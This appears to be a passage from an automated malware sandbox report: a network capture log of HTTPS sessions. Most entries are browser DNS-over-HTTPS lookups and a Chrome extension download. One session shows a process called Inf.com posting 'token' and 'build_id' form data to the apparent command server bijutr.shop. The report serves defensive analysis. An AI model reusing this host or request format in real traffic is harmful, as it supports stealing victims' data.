                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 26 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom&A)


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  17192.168.2.549923172.64.41.34432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f8718ac7915c32e-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 01 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  18192.168.2.549922162.159.61.34432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f8718acb86d18d0-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f4 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomPC)


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  19192.168.2.549920188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----UAI5XB1VS0ZUAIEK6PHD
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 3165
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 55 41 49 35 58 42 31 56 53 30 5a 55 41 49 45 4b 36 50 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 55 41 49 35 58 42 31 56 53 30 5a 55 41 49 45 4b 36 50 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 55 41 49 35 58 42 31 56 53 30 5a 55 41 49 45 4b 36 50 48 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------UAI5XB1VS0ZUAIEK6PHDContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------UAI5XB1VS0ZUAIEK6PHDContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------UAI5XB1VS0ZUAIEK6PHDCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  20192.168.2.549912142.250.181.654432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:30 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                  Content-Length: 154477
                                                                                                                                                                                                                                                                                                  X-GUploader-UploadID: AFiumC7tH5ZzJMfNfa9BIZr8250lXMXmPl3ep-Vo_9n3cA_0tj0h-vy5u0X0e4GXYF7rzyXp
                                                                                                                                                                                                                                                                                                  X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                                  Expires: Fri, 26 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                  Age: 50596
                                                                                                                                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                  ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                  Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                                                  Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                                                                  Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                                                  Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                                                  Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                                                  Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                                                  Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                                                  Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                                                  Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:31 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
